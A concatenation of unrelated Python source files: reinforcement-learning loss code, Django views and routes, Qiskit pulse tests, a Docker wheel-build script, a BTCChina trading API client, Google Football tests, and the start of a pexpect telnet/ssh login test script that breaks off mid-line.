torch.tensor(expected_q).cuda()).pow(2).mean() losses['q_loss'] = q_loss def cal_p_loss(self, sample, losses, log_vars=None, global_steps=None): obs = sample['obs'] adj = sample['adj'] batch_size, n_ant, _ = obs.shape probs, log_probs = self.actor_learned_model(obs, adj, return_log_pi=True) log_probs = torch.log(probs + 1e-15) # [batch, agent, action] with torch.no_grad(): # q_values: Q(s,a), [b, n_agent, n_action] q_values = self.critic_learned_model(obs, adj) # baseline, V(s)=E_a[Q(s,a)]=\Sigma \pi(a|s)*Q(s,a) v_values = (probs * q_values).sum(dim=-1, keepdim=True) # advantage, A(s,a)=Q(s,a)-V(s) advantages = q_values - v_values # p_loss: \Sigma log\pi(a|s) * (A(s,a) - log\pi(a|s)) p_loss = -(log_probs * (advantages - self.alpha * log_probs)).mean() losses['p_loss'] = p_loss def cal_alpha_loss(self, sample, losses, log_vars=None, global_steps=None): obs = sample['obs'] adj = sample['adj'] with torch.no_grad(): probs, log_probs = self.actor_learned_model(obs, adj, return_log_pi=True) entropies = (-probs * log_probs).sum(dim=-1, keepdim=True) # [b,agent] if log_vars is not None: entropy = entropies.mean().item() log_vars['action_entropy'] = (global_steps, entropy) entropy_loss = (- soft_actor_critic_model_entropy_activation_function(self.alpha) * (self.target_entropy - entropies)).mean() losses['entropy_loss'] = entropy_loss def clip_alpha_grad(self, log_vars=None, global_steps=None): torch.nn.utils.clip_grad_norm_(self.alpha, max_norm=self.alpha.item()*0.01, norm_type=1) self.alpha.data = torch.max(self.alpha.data, torch.ones_like(self.alpha.data)*1e-5) if log_vars is not None: log_vars['alpha'] = (global_steps, self.alpha.item()) encyclopedia/views.py from django.shortcuts import render from . import util from . import converter def index(request): return converter.index(request) def new_entry(request, title): return converter.entry_page(request, title) def search(request): return converter.search(request) def create_new(request): return converter.create_new_page(request) def edit_page(request, title): return converter.edit(request, title) def random(request): return converter.rand_page(request)import os import re import pandas as pd from datetime import datetime, timedelta, date # compatibility with ipython #os.chdir(os.path.dirname(__file__)) import json import boto3 from pathlib import Path from coords_to_kreis import coords_convert import settings def aggregate(date): client_s3 = boto3.client("s3") s3 = boto3.resource('s3') content_object = s3.Object(settings.BUCKET, "aggdata/live/{}/{}/{}/zugdata.json".format(str(date.year).zfill(4), str(date.month).zfill(2), str(date.day).zfill(2))) file_content = content_object.get()['Body'].read().decode('utf-8') json_content = json.loads(file_content) df = pd.DataFrame(json_content) df["landkreis"] = coords_convert(df) print(df.shape) print(df["landkreis"].unique().shape) #df["district"] = coords_convert(df) #print(df.columns) df.drop(["lon", "lat", 'geometry', "name", "date"], inplace = True, axis = 1) df = df.set_index("landkreis") df = 1 - df df = df.reset_index() # aggregate by region # aggregate by region return df.to_dict() #pd.DataFrame(aggregate(date.today() - timedelta(days = 4))) wshanks/qiskit-terra # This code is part of Qiskit. # # (C) Copyright IBM 2017, 2020. # # This code is licensed under the Apache License, Version 2.0. You may # obtain a copy of this license in the LICENSE.txt file in the root directory # of this source tree or at http://www.apache.org/licenses/LICENSE-2.0. # # Any modifications or derivative works of this code must retain this # copyright notice, and modified files need to carry a notice indicating # that they have been altered from the originals. """Test cases for parameters used in Schedules.""" import unittest from copy import deepcopy import numpy as np from qiskit import pulse, assemble from qiskit.circuit import Parameter from qiskit.pulse import PulseError from qiskit.pulse.channels import DriveChannel, AcquireChannel, MemorySlot from qiskit.pulse.transforms import inline_subroutines from qiskit.test import QiskitTestCase from qiskit.test.mock import FakeAlmaden class TestPulseParameters(QiskitTestCase): """Tests usage of Parameters in qiskit.pulse; specifically in Schedules, Instructions, and Pulses. """ def setUp(self): """Just some useful, reusable Parameters and constants.""" super().setUp() self.alpha = Parameter('⍺') self.beta = Parameter('beta') self.gamma = Parameter('γ') self.phi = Parameter('ϕ') self.theta = Parameter('ϑ') self.amp = Parameter('amp') self.sigma = Parameter('sigma') self.qubit = Parameter('q') self.dur = Parameter('dur') self.freq = 4.5e9 self.shift = 0.2e9 self.phase = 3.1415 / 4 self.backend = FakeAlmaden() def test_parameter_attribute_channel(self): """Test the ``parameter`` attributes.""" chan = DriveChannel(self.qubit*self.alpha) self.assertTrue(chan.is_parameterized()) self.assertEqual(chan.parameters, {self.qubit, self.alpha}) chan = chan.assign(self.qubit, self.alpha) self.assertEqual(chan.parameters, {self.alpha}) chan = chan.assign(self.alpha, self.beta) self.assertEqual(chan.parameters, {self.beta}) chan = chan.assign(self.beta, 1) self.assertFalse(chan.is_parameterized()) def test_parameter_attribute_instruction(self): """Test the ``parameter`` attributes.""" inst = pulse.ShiftFrequency(self.alpha*self.qubit, DriveChannel(self.qubit)) self.assertTrue(inst.is_parameterized()) self.assertEqual(inst.parameters, {self.alpha, self.qubit}) inst.assign_parameters({self.alpha: self.qubit}) self.assertEqual(inst.parameters, {self.qubit}) inst.assign_parameters({self.qubit: 1}) self.assertFalse(inst.is_parameterized()) self.assertEqual(inst.parameters, set()) def test_parameter_attribute_play(self): """Test the ``parameter`` attributes.""" inst = pulse.Play(pulse.Gaussian(self.dur, self.amp, self.sigma), pulse.DriveChannel(self.qubit)) self.assertTrue(inst.is_parameterized()) self.assertSetEqual(inst.parameters, {self.dur, self.amp, self.sigma, self.qubit}) inst = pulse.Play(pulse.Gaussian(self.dur, 0.1, self.sigma), pulse.DriveChannel(self.qubit)) self.assertTrue(inst.is_parameterized()) self.assertSetEqual(inst.parameters, {self.dur, self.sigma, self.qubit}) def test_parameter_attribute_schedule(self): """Test the ``parameter`` attributes.""" schedule = pulse.Schedule() self.assertFalse(schedule.is_parameterized()) schedule += pulse.SetFrequency(self.alpha, DriveChannel(0)) self.assertEqual(schedule.parameters, {self.alpha}) schedule += pulse.ShiftFrequency(self.gamma, DriveChannel(0)) self.assertEqual(schedule.parameters, {self.alpha, self.gamma}) schedule += pulse.SetPhase(self.phi, DriveChannel(1)) self.assertTrue(schedule.is_parameterized()) self.assertEqual(schedule.parameters, {self.alpha, self.gamma, self.phi}) schedule.assign_parameters({self.phi: self.alpha, self.gamma: self.shift}) self.assertEqual(schedule.parameters, {self.alpha}) schedule.assign_parameters({self.alpha: self.beta}) self.assertEqual(schedule.parameters, {self.beta}) schedule.assign_parameters({self.beta: 10}) self.assertFalse(schedule.is_parameterized()) def test_straight_schedule_bind(self): """Nothing fancy, 1:1 mapping.""" schedule = pulse.Schedule() schedule += pulse.SetFrequency(self.alpha, DriveChannel(0)) schedule += pulse.ShiftFrequency(self.gamma, DriveChannel(0)) schedule += pulse.SetPhase(self.phi, DriveChannel(1)) schedule += pulse.ShiftPhase(self.theta, DriveChannel(1)) schedule.assign_parameters({self.alpha: self.freq, self.gamma: self.shift, self.phi: self.phase, self.theta: -self.phase}) insts = assemble(schedule, self.backend).experiments[0].instructions GHz = 1e9 # pylint: disable=invalid-name self.assertEqual(float(insts[0].frequency*GHz), self.freq) self.assertEqual(float(insts[1].frequency*GHz), self.shift) self.assertEqual(float(insts[2].phase), self.phase) self.assertEqual(float(insts[3].phase), -self.phase) def test_multiple_parameters(self): """Expressions of parameters with partial assignment.""" schedule = pulse.Schedule() schedule += pulse.SetFrequency(self.alpha + self.beta, DriveChannel(0)) schedule += pulse.ShiftFrequency(self.gamma + self.beta, DriveChannel(0)) schedule += pulse.SetPhase(self.phi, DriveChannel(1)) # Partial bind delta = 1e9 schedule.assign_parameters({self.alpha: self.freq - delta}) schedule.assign_parameters({self.beta: delta}) schedule.assign_parameters({self.gamma: self.shift - delta}) schedule.assign_parameters({self.phi: self.phase}) insts = schedule.instructions self.assertEqual(float(insts[0][1].frequency), self.freq) self.assertEqual(float(insts[1][1].frequency), self.shift) self.assertEqual(float(insts[2][1].phase), self.phase) def test_with_function(self): """Test ParameterExpressions formed trivially in a function.""" def get_frequency(variable): return 2*variable def get_shift(variable): return variable - 1 schedule = pulse.Schedule() schedule += pulse.SetFrequency(get_frequency(self.alpha), DriveChannel(0)) schedule += pulse.ShiftFrequency(get_shift(self.gamma), DriveChannel(0)) schedule.assign_parameters({self.alpha: self.freq / 2, self.gamma: self.shift + 1}) insts = schedule.instructions self.assertEqual(float(insts[0][1].frequency), self.freq) self.assertEqual(float(insts[1][1].frequency), self.shift) def test_substitution(self): """Test Parameter substitution (vs bind).""" schedule = pulse.Schedule() schedule += pulse.SetFrequency(self.alpha, DriveChannel(0)) schedule.assign_parameters({self.alpha: 2*self.beta}) self.assertEqual(schedule.instructions[0][1].frequency, 2*self.beta) schedule.assign_parameters({self.beta: self.freq / 2}) self.assertEqual(float(schedule.instructions[0][1].frequency), self.freq) def test_substitution_with_existing(self): """Test that substituting one parameter with an existing parameter works.""" schedule = pulse.Schedule() schedule += pulse.SetFrequency(self.alpha, DriveChannel(self.qubit)) schedule.assign_parameters({self.alpha: 1e9*self.qubit}) self.assertEqual(schedule.instructions[0][1].frequency, 1e9*self.qubit) schedule.assign_parameters({self.qubit: 2}) self.assertEqual(float(schedule.instructions[0][1].frequency), 2e9) def test_channels(self): """Test that channel indices can also be parameterized and assigned.""" schedule = pulse.Schedule() schedule += pulse.ShiftPhase(self.phase, DriveChannel(2*self.qubit)) schedule.assign_parameters({self.qubit: 4}) self.assertEqual(schedule.instructions[0][1].channel, DriveChannel(8)) def test_acquire_channels(self): """Test Acquire instruction with multiple channels parameterized.""" schedule = pulse.Schedule() schedule += pulse.Acquire(16000, AcquireChannel(self.qubit), MemorySlot(self.qubit)) schedule.assign_parameters({self.qubit: 1}) self.assertEqual(schedule.instructions[0][1].channel, AcquireChannel(1)) self.assertEqual(schedule.instructions[0][1].mem_slot, MemorySlot(1)) def test_overlapping_pulses(self): """Test that an error is still raised when overlapping instructions are assigned.""" schedule = pulse.Schedule() schedule |= pulse.Play(pulse.Waveform([1, 1, 1, 1]), DriveChannel(self.qubit)) with self.assertRaises(PulseError): schedule |= pulse.Play(pulse.Waveform([0.5, 0.5, 0.5, 0.5]), DriveChannel(self.qubit)) def test_overlapping_on_assignment(self): """Test that assignment will catch against existing instructions.""" schedule = pulse.Schedule() schedule |= pulse.Play(pulse.Waveform([1, 1, 1, 1]), DriveChannel(1)) schedule |= pulse.Play(pulse.Waveform([1, 1, 1, 1]), DriveChannel(self.qubit)) with self.assertRaises(PulseError): schedule.assign_parameters({self.qubit: 1}) def test_overlapping_on_expression_assigment_to_zero(self): """Test constant*zero expression conflict.""" schedule = pulse.Schedule() schedule |= pulse.Play(pulse.Waveform([1, 1, 1, 1]), DriveChannel(self.qubit)) schedule |= pulse.Play(pulse.Waveform([1, 1, 1, 1]), DriveChannel(2*self.qubit)) with self.assertRaises(PulseError): schedule.assign_parameters({self.qubit: 0}) def test_merging_upon_assignment(self): """Test that schedule can match instructions on a channel.""" schedule = pulse.Schedule() schedule |= pulse.Play(pulse.Waveform([1, 1, 1, 1]), DriveChannel(1)) schedule = schedule.insert(4, pulse.Play(pulse.Waveform([1, 1, 1, 1]), DriveChannel(self.qubit))) schedule.assign_parameters({self.qubit: 1}) self.assertEqual(schedule.ch_duration(DriveChannel(1)), 8) self.assertEqual(schedule.channels, (DriveChannel(1),)) def test_overlapping_on_multiple_assignment(self): """Test that assigning one qubit then another raises error when overlapping.""" qubit2 = Parameter('q2') schedule = pulse.Schedule() schedule |= pulse.Play(pulse.Waveform([1, 1, 1, 1]), DriveChannel(self.qubit)) schedule |= pulse.Play(pulse.Waveform([1, 1, 1, 1]), DriveChannel(qubit2)) schedule.assign_parameters({qubit2: 2}) with self.assertRaises(PulseError): schedule.assign_parameters({self.qubit: 2}) def test_play_with_parametricpulse(self): """Test Parametric Pulses with parameters determined by ParameterExpressions in the Play instruction.""" waveform = pulse.library.Gaussian(duration=128, sigma=self.sigma, amp=self.amp) schedule = pulse.Schedule() schedule += pulse.Play(waveform, DriveChannel(10)) schedule.assign_parameters({self.amp: 0.2, self.sigma: 4}) self.backend.configuration().parametric_pulses = ['gaussian', 'drag'] insts = schedule.instructions self.assertEqual(insts[0][1].pulse.amp, 0.2) self.assertEqual(insts[0][1].pulse.sigma, 4.) def test_parametric_pulses_parameter_assignment(self): """Test Parametric Pulses with parameters determined by ParameterExpressions.""" waveform = pulse.library.GaussianSquare(duration=1280, sigma=self.sigma, amp=self.amp, width=1000) waveform = waveform.assign_parameters({self.amp: 0.3, self.sigma: 12}) self.assertEqual(waveform.amp, 0.3) self.assertEqual(waveform.sigma, 12) waveform = pulse.library.Drag(duration=1280, sigma=self.sigma, amp=self.amp, beta=2) waveform = waveform.assign_parameters({self.sigma: 12.7}) self.assertEqual(waveform.amp, self.amp) self.assertEqual(waveform.sigma, 12.7) @unittest.skip("Not yet supported by ParameterExpression") def test_complex_value_assignment(self): """Test that complex values can be assigned to Parameters.""" waveform = pulse.library.Constant(duration=1280, amp=self.amp) waveform.assign_parameters({self.amp: 0.2j}) self.assertEqual(waveform.amp, 0.2j) def test_invalid_parametric_pulses(self): """Test that invalid parameters are still checked upon assignment.""" schedule = pulse.Schedule() waveform = pulse.library.Constant(duration=1280, amp=2*self.amp) schedule += pulse.Play(waveform, DriveChannel(0)) with self.assertRaises(PulseError): waveform.assign_parameters({self.amp: 0.6}) def test_get_parameter(self): """Test that get parameter by name.""" param1 = Parameter('amp') param2 = Parameter('amp') schedule = pulse.Schedule() waveform1 = pulse.library.Constant(duration=1280, amp=param1) waveform2 = pulse.library.Constant(duration=1280, amp=param2) schedule += pulse.Play(waveform1, DriveChannel(0)) schedule += pulse.Play(waveform2, DriveChannel(1)) self.assertEqual(len(schedule.get_parameters('amp')), 2) def test_reference_to_subroutine_params(self): """Test that get parameter objects from subroutines.""" param1 = Parameter('amp') waveform = pulse.library.Constant(duration=100, amp=param1) program_layer0 = pulse.Schedule() program_layer0 += pulse.Play(waveform, DriveChannel(0)) # from call instruction program_layer1 = pulse.Schedule() program_layer1 += pulse.instructions.Call(program_layer0) self.assertEqual(program_layer1.get_parameters('amp')[0], param1) # from nested call instruction program_layer2 = pulse.Schedule() program_layer2 += pulse.instructions.Call(program_layer1) self.assertEqual(program_layer2.get_parameters('amp')[0], param1) def test_assign_parameter_to_subroutine(self): """Test that assign parameter objects to subroutines.""" param1 = Parameter('amp') waveform = pulse.library.Constant(duration=100, amp=param1) program_layer0 = pulse.Schedule() program_layer0 += pulse.Play(waveform, DriveChannel(0)) reference = deepcopy(program_layer0).assign_parameters({param1: 0.1}) # to call instruction program_layer1 = pulse.Schedule() program_layer1 += pulse.instructions.Call(program_layer0) target = deepcopy(program_layer1).assign_parameters({param1: 0.1}) self.assertEqual(inline_subroutines(target), reference) # to nested call instruction program_layer2 = pulse.Schedule() program_layer2 += pulse.instructions.Call(program_layer1) target = deepcopy(program_layer2).assign_parameters({param1: 0.1}) self.assertEqual(inline_subroutines(target), reference) def test_assign_parameter_to_subroutine_parameter(self): """Test that assign parameter objects to parameter of subroutine.""" param1 = Parameter('amp') waveform = pulse.library.Constant(duration=100, amp=param1) param_sub1 = Parameter('amp') param_sub2 = Parameter('phase') subroutine = pulse.Schedule() subroutine += pulse.Play(waveform, DriveChannel(0)) reference = deepcopy(subroutine).assign_parameters({param1: 0.1 * np.exp(1j * 0.5)}) main_prog = pulse.Schedule() pdict = {param1: param_sub1 * np.exp(1j * param_sub2)} main_prog += pulse.instructions.Call(subroutine, value_dict=pdict) # parameter is overwritten by parameters self.assertEqual(len(main_prog.parameters), 2) target = deepcopy(main_prog).assign_parameters({param_sub1: 0.1, param_sub2: 0.5}) self.assertEqual(inline_subroutines(target), reference) class TestParameterDuration(QiskitTestCase): """Tests parametrization of instruction duration.""" def test_pulse_duration(self): """Test parametrization of pulse duration.""" dur = Parameter('dur') test_pulse = pulse.Gaussian(dur, 0.1, dur/4) ref_pulse = pulse.Gaussian(160, 0.1, 40) self.assertEqual(test_pulse.assign_parameters({dur: 160}), ref_pulse) def test_play_duration(self): """Test parametrization of play instruction duration.""" dur = Parameter('dur') ch = pulse.DriveChannel(0) test_play = pulse.Play(pulse.Gaussian(dur, 0.1, dur/4), ch) test_play.assign_parameters({dur: 160}) self.assertEqual(test_play.duration, 160) def test_delay_duration(self): """Test parametrization of delay duration.""" dur = Parameter('dur') ch = pulse.DriveChannel(0) test_delay = pulse.Delay(dur, ch) test_delay.assign_parameters({dur: 300}) self.assertEqual(test_delay.duration, 300) def test_acquire_duration(self): """Test parametrization of acquire duration.""" dur = Parameter('dur') ch = pulse.AcquireChannel(0) mem_slot = pulse.MemorySlot(0) test_acquire = pulse.Acquire(dur, ch, mem_slot=mem_slot) test_acquire.assign_parameters({dur: 300}) self.assertEqual(test_acquire.duration, 300) def test_is_parameterized(self): """Test is parameterized method for parameter duration.""" dur = Parameter('dur') ch = pulse.DriveChannel(0) test_play = pulse.Play(pulse.Gaussian(dur, 0.1, dur/4), ch) self.assertEqual(test_play.is_parameterized(), True) def test_cannot_build_schedule(self): """Test we cannot build schedule with parameterized instructions""" dur = Parameter('dur') ch = pulse.DriveChannel(0) test_play = pulse.Play(pulse.Gaussian(dur, 0.1, dur/4), ch) sched = pulse.Schedule() with self.assertRaises(pulse.exceptions.UnassignedDurationError): sched.insert(0, test_play) docker/build_wheels.py import os import subprocess CYTHON_VERSION = '0.27.3' CUPY_VERSION = '4.0.0' PYNVVL_VERSION = '0.0.2a3' WHEEL_CONFIGS = { '8.0': { 'lib': 'docker/lib/cuda-8.0', 'tag': 'mitmul/pynvvl:cuda-8.0-wheels', 'test': 'mitmul/pynvvl:cuda-8.0-test', }, '9.0': { 'lib': 'docker/lib/cuda-9.0', 'tag': 'mitmul/pynvvl:cuda-9.0-wheels', 'test': 'mitmul/pynvvl:cuda-9.0-test', }, '9.1': { 'lib': 'docker/lib/cuda-9.1', 'tag': 'mitmul/pynvvl:cuda-9.1-wheels', 'test': 'mitmul/pynvvl:cuda-9.1-test', }, } PYTHON_VERSIONS = { '2.7.6': { 'python_tag': 'cp27', 'linux_abi_tag': 'cp27mu', }, '3.4.7': { 'python_tag': 'cp34', 'linux_abi_tag': 'cp34m', }, '3.5.1': { 'python_tag': 'cp35', 'linux_abi_tag': 'cp35m', }, '3.6.0': { 'python_tag': 'cp36', 'linux_abi_tag': 'cp36m', }, } def build_docker_image(cuda_version, tag, test): python_versions = ' '.join(PYTHON_VERSIONS.keys()) cudda_version_no_dot = cuda_version.replace('.', '') subprocess.call([ 'docker', 'build', '--build-arg', 'cuda_version={}'.format(cuda_version), '--build-arg', 'python_versions={}'.format(python_versions), '--build-arg', 'cython_version={}'.format(CYTHON_VERSION), '--build-arg', 'cupy_version={}'.format(CUPY_VERSION), '--build-arg', 'cupy_package_name=cupy-cuda{}'.format( cudda_version_no_dot), '-t', tag, '-f', 'docker/Dockerfile.wheels', 'docker' ]) subprocess.call([ 'docker', 'build', '--build-arg', 'cuda_version={}'.format(cuda_version), '--build-arg', 'python_versions={}'.format(python_versions), '--build-arg', 'cython_version={}'.format(CYTHON_VERSION), '--build-arg', 'cupy_version={}'.format(CUPY_VERSION), '--build-arg', 'pynvvl_version={}'.format(PYNVVL_VERSION), '--build-arg', 'cupy_package_name=cupy-cuda{}'.format( cudda_version_no_dot), '-t', test, '-f', 'docker/Dockerfile.test', 'docker' ]) def build_wheels(cuda_version): for python_version in PYTHON_VERSIONS.keys(): print('-' * 10, 'Building for Python {}'.format(python_version), '-' * 10) subprocess.call( 'nvidia-docker run' ' --rm' ' -v {source_dir}:/pynvvl' ' -t {tag}' ' bash -c' ' " \ find / -name \"*libnvcuvid.so.1\" | \ xargs -IXXX ln -s XXX /usr/local/lib/libnvcuvid.so && \ pyenv global {python_version} && pyenv rehash && \ cd /pynvvl && python setup.py bdist_wheel \ -d dist/cuda-{cuda_version} \ --package-name {package_name} \ "'.format( source_dir=os.getcwd(), tag=WHEEL_CONFIGS[cuda_version]['tag'], python_version=python_version, cuda_version=cuda_version, package_name='pynvvl_cuda{}'.format( cuda_version.replace('.', '')), ), shell=True) subprocess.call( 'nvidia-docker run' ' --rm' ' -v {source_dir}:/pynvvl' ' -t {tag}' ' bash -c' ' " \ for file in \$(ls /pynvvl/dist/cuda-{cuda_version}/*.whl); \ do \ echo \$file | \ sed --expression=\"s/linux/manylinux1/g\" | \ xargs -IXXX mv \$file XXX; \ done; \ "'.format( source_dir=os.getcwd(), tag=WHEEL_CONFIGS[cuda_version]['tag'], cuda_version=cuda_version, ), shell=True) for python_version, tags in PYTHON_VERSIONS.items(): print('-' * 10, 'Testing wheel for Python {}'.format(python_version), '-' * 10) package_python = '{}-{}'.format( tags['python_tag'], tags['linux_abi_tag']) # Test the wheel wheel_name = '{}-{}-{}-manylinux1_x86_64.whl'.format( 'pynvvl_cuda{}'.format(cuda_version.replace('.', '')), PYNVVL_VERSION, package_python ) subprocess.call( 'nvidia-docker run' ' --rm' ' -v {source_dir}/examples:/examples' ' -v {source_dir}/dist/cuda-{cuda_version}:/wheels' ' -t {tag}' ' bash -c' ' " \ pyenv global {python_version} && pyenv rehash && \ pip install /wheels/{wheel_name} && \ cd / && python examples/simple_load.py \ > /examples/cuda-{cuda_version}_python-{python_version}.txt && \ mv /examples/sample.png \ /examples/sample_cuda-{cuda_version}_python-{python_version}.png \ "'.format( source_dir=os.getcwd(), tag=WHEEL_CONFIGS[cuda_version]['test'], cuda_version=cuda_version, python_version=python_version, wheel_name=wheel_name, ), shell=True) # Build Docker images for cuda_version, wheel_config in WHEEL_CONFIGS.items(): build_docker_image(cuda_version, wheel_config['tag'], wheel_config['test']) # Build wheels for cuda_version, wheel_config in WHEEL_CONFIGS.items(): print('-' * 10, 'Building for CUDA {}'.format(cuda_version), '-' * 10) build_wheels(cuda_version) print('=' * 30) api/tradeapi.py #!/usr/bin/env python # -*- coding: utf-8 -*- import time import re import hmac import hashlib import base64 import httplib import json class BTCChina(): def __init__(self,access=None,secret=None,tradeType=None): self.access_key=access self.secret_key=secret self.conn=httplib.HTTPSConnection("api.btcchina.com", 443, timeout=10) self.tradeType = tradeType def _get_tonce(self): return int(time.time()*1000000) def _get_params_hash(self,pdict): pstring="" # The order of params is critical for calculating a correct hash fields=['tonce','accesskey','requestmethod','id','method','params'] for f in fields: if pdict[f]: if f == 'params': # Convert list to string, then strip brackets and spaces # probably a cleaner way to do this param_string=re.sub("[\[\] ]","",str(pdict[f])) param_string=re.sub("'",'',param_string) pstring+=f+'='+param_string+'&' else: pstring+=f+'='+str(pdict[f])+'&' else: pstring+=f+'=&' pstring=pstring.strip('&') # now with correctly ordered param string, calculate hash phash = hmac.new(self.secret_key, pstring, hashlib.sha1).hexdigest() return phash def _private_request(self,post_data): try: #fill in common post_data parameters tonce=self._get_tonce() post_data['tonce']=tonce post_data['accesskey']=self.access_key post_data['requestmethod']='post' # If ID is not passed as a key of post_data, just use tonce if not 'id' in post_data: post_data['id']=tonce pd_hash=self._get_params_hash(post_data) # must use b64 encode auth_string='Basic '+base64.b64encode(self.access_key+':'+pd_hash) headers={'Authorization':auth_string,'Json-Rpc-Tonce':tonce} #post_data dictionary passed as JSON self.conn.request("POST",'/api_trade_v1.php',json.dumps(post_data),headers) response = self.conn.getresponse() # check response code, ID, and existence of 'result' or 'error' # before passing a dict of results if response.status == 200: # this might fail if non-json data is returned resp_dict = json.loads(response.read()) # The id's may need to be used by the calling application, # but for now, check and discard from the return dict if str(resp_dict['id']) == str(post_data['id']): if 'result' in resp_dict: return resp_dict['result'] elif 'error' in resp_dict: return resp_dict['error'] else: # not great error handling.... print "status:",response.status print "reason:",response.reason return None except Exception, e: print 'Failed to get response:' + str(e) return None def get_account_info(self,post_data={}): post_data['method']='getAccountInfo' post_data['params']=[] return self._private_request(post_data) def get_market_depth(self,post_data={}): post_data['method']='getMarketDepth2' post_data['params']=[post_data['limit'],self.tradeType] return self._private_request(post_data) def buy(self,price,amount,post_data={}): post_data['method']='buyOrder2' post_data['params']=[price,amount,self.tradeType] return self._private_request(post_data) def sell(self,price,amount,post_data={}): post_data['method']='sellOrder' post_data['params']=[price,amount,self.tradeType] return self._private_request(post_data) def cancel(self,order_id,post_data={}): post_data['method']='cancelOrder' post_data['params']=[self.tradeType,order_id] return self._private_request(post_data) def request_withdrawal(self,currency,amount,post_data={}): post_data['method']='requestWithdrawal' post_data['params']=[currency,amount] return self._private_request(post_data) def get_deposits(self,currency='BTC',pending=True,post_data={}): post_data['method']='getDeposits' if pending: post_data['params']=[currency] else: post_data['params']=[currency,''] # empty if false return self._private_request(post_data) def get_orders(self,id=None,open_only=True,post_data={}): # this combines getOrder and getOrders if id is None: post_data['method']='getOrders' if open_only: post_data['params']=[] else: post_data['params']=[''] # empty if false else: post_data['method']='getOrder' post_data['params']=[id] return self._private_request(post_data) def get_withdrawals(self,id='BTC',pending=True,post_data={}): # this combines getWithdrawal and getWithdrawls try: id = int(id) post_data['method']='getWithdrawal' post_data['params']=[id] except: post_data['method']='getWithdrawals' if pending: post_data['params']=[id] else: post_data['params']=[id,''] # empty if false return self._private_request(post_data) """Pylint extension with performance anti-patterns""" from typing import TYPE_CHECKING from perflint.checker import ForLoopChecker if TYPE_CHECKING: from pylint.lint import PyLinter __version__ = "0.0.1" def register(linter: "PyLinter") -> None: """This required method auto registers the checker during initialization. :param linter: The linter to register the checker to. """ linter.register_checker(ForLoopChecker(linter)) 1-10 # coding=utf-8 # Copyright 2019 Google LLC # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Football action set tests.""" import unittest from gfootball.env import football_action_set import numpy as np named_action_from_action_set = football_action_set.named_action_from_action_set class FootballActionSetTest(unittest.TestCase): def test_action_from_basic_action_set(self): action_set = football_action_set.get_action_set({'action_set': 'default'}) self.assertEqual( named_action_from_action_set(action_set, 1), football_action_set.action_left) self.assertEqual( named_action_from_action_set(action_set, 12), football_action_set.action_shot) self.assertEqual(named_action_from_action_set(action_set, np.int32(1)), football_action_set.action_left) self.assertRaises(Exception, named_action_from_action_set, action_set, np.int32(100)) self.assertEqual( named_action_from_action_set(action_set, football_action_set.action_left), football_action_set.action_left) self.assertRaises(Exception, named_action_from_action_set, action_set, 100) def test_action_set_full(self): self.assertEqual(football_action_set.full_action_set[0], football_action_set.action_idle) def test_disable_action(self): self.assertEqual( football_action_set.disable_action( football_action_set.action_left), football_action_set.action_release_direction) self.assertEqual( football_action_set.disable_action( football_action_set.action_release_direction), football_action_set.action_release_direction) def test_sticky_actions_have_release(self): for i in football_action_set.action_set_dict: action_set = football_action_set.action_set_dict[i] for action in action_set: if action._sticky: reverse = football_action_set.disable_action(action) self.assertTrue( reverse in action_set, 'Action {} has no release action in action set {}'.format( action._name, i)) if __name__ == '__main__': unittest.main() 10-100 from .clevr_executor import ClevrExecutor from functools import lru_cache def get_executor(opt, *args, **kwargs): print('| creating %s executor' % opt.dataset) graph_parser = kwargs.get('graph_parser') embedder = kwargs.get('embedder') if opt.dataset == 'clevr': train_scene_json = opt.clevr_train_scene_path if opt.is_train else None val_scene_json = opt.clevr_val_scene_path vocab_json = opt.clevr_vocab_path else: raise ValueError('Invalid dataset') executor = ClevrExecutor(train_scene_json, val_scene_json, vocab_json, graph_parser=graph_parser, embedder=embedder) return executor def get_executor_orig(opt): print('| creating %s executor' % opt.dataset) if opt.dataset == 'clevr': train_scene_json = opt.clevr_train_scene_path val_scene_json = opt.clevr_val_scene_path vocab_json = opt.clevr_vocab_path else: raise ValueError('Invalid dataset') executor = ClevrExecutor(train_scene_json, val_scene_json, vocab_json) return executorHuajunZhou-TJ/onsite0 from .env_openx import EnvOpenx def make(path): env = EnvOpenx() observation = env.init(path) return env,observationbackend/whatsapp/main/urls.py from django.urls import include, path from rest_framework import routers from .views import CustomUserViewSet from .views import RegistrationView from .views import OTPValidationView from .views import index from .views import room router = routers.DefaultRouter() router.register(r'', CustomUserViewSet) urlpatterns = [ # path('', include(router.urls)), path('', index, name='index'), path('chat//', room, name='room'), path(r'register', RegistrationView.as_view()), path(r'validate-otp', OTPValidationView.as_view()), path('api-auth/', include('rest_framework.urls', namespace='rest_framework')) ] #!/usr/bin/env python # -*- coding: utf-8 -*- ''' * Copyright (c) 2009-~ * * Author: <> * Created Time: Sat 30 Jan 2016 11:33:50 AM CST * File Name: sys_fun_test.py * * Description: ''' import pexpect import threading import os,sys,time import multiprocessing Debug = 0 Manual = 0 #Test case switch. '1':on ;'0':off TestTelnet = 0 TestSsh = 1 TestFtp = 0 # Repeat times GetTimes = sys.argv[1] RepeatTimes = int(GetTimes) # Time Interval of starting threads TimeInterval = 0.2 # Ssh port number SshPort = '22' # Remote host IP address IpAddress = '192.168.3.11' # Username for login LoginName = 'admin' # Password for login LoginPassword = '' # Prompt such as:’ $ ’ , ‘ # ’ or ’ > ’ LoginPrompt = '[$#>]' PasswordPrompt = 'admin@'+IpAddress+'\'s password:' #Need to be optimized by using process pool def main(num): #define thread pool threads = [] #greate thread objects if ( TestTelnet == 1 ): for i in range(num): threads.append(threading.Thread(target=telnet_cmd, args=(IpAddress,LoginPassword,tel_list))) if TestSsh is 1: for i in range(0,num): threads.append(threading.Thread(target=ssh_cmd, args=(IpAddress,LoginPassword,ssh_list))) if TestFtp is 1: for i in range(0,num): threads.append(threading.Thread(target=ftp_cmd, args=(IpAddress,LoginPassword,ftp_list))) #start all threads for t in range(len(threads)): threads[t].start() time.sleep(TimeInterval) #The main thread waits for all sub thread exits for t in range(len(threads)): threads[t].join() def telnet_cmd(IpAddress,LoginPassword,tel_list): cmd = 'telnet ' + IpAddress # 为 telnet 生成 spawn 类子程序 telnet = pexpect.spawn(cmd) # 期待'login'字符串出现,从而接下来可以输入用户名 mylist = telnet.expect(["login", 